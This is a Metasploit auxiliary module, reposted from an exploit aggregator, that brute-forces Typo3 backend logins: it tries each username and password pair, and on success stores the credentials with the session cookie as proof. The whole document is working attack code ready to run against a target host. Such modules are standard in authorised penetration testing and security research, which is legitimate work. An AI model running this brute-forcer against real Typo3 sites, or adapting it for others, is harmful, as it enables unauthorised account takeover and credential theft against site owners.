Share
## https://sploitus.com/exploit?id=PACKETSTORM:181099
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HTTP::Typo3  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Typo3 Login Bruteforcer',  
'Description' => 'This module attempts to bruteforce Typo3 logins.',  
'Author' => [ 'Christian Mehlmauer' ],  
'License' => MSF_LICENSE  
)  
end  
  
def run_host(ip)  
print_status("Trying to bruteforce login")  
  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => target_uri.to_s  
})  
  
unless res  
vprint_error("#{ip} seems to be down")  
return  
end  
  
each_user_pass { |user, pass|  
try_login(user,pass)  
}  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: opts[:service_name],  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
last_attempted_at: Time.now,  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::SUCCESSFUL,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def try_login(user, pass)  
vprint_status("Trying username:'#{user}' password: '#{pass}'")  
cookie = typo3_backend_login(user, pass)  
if cookie  
print_good("Successful login '#{user}' password: '#{pass}'")  
report_cred(  
ip: rhost,  
port: rport,  
service_name: 'typo3',  
user: user,  
password: pass,  
proof: cookie  
)  
return :next_user  
else  
vprint_error("failed to login as '#{user}' password: '#{pass}'")  
return  
end  
end  
end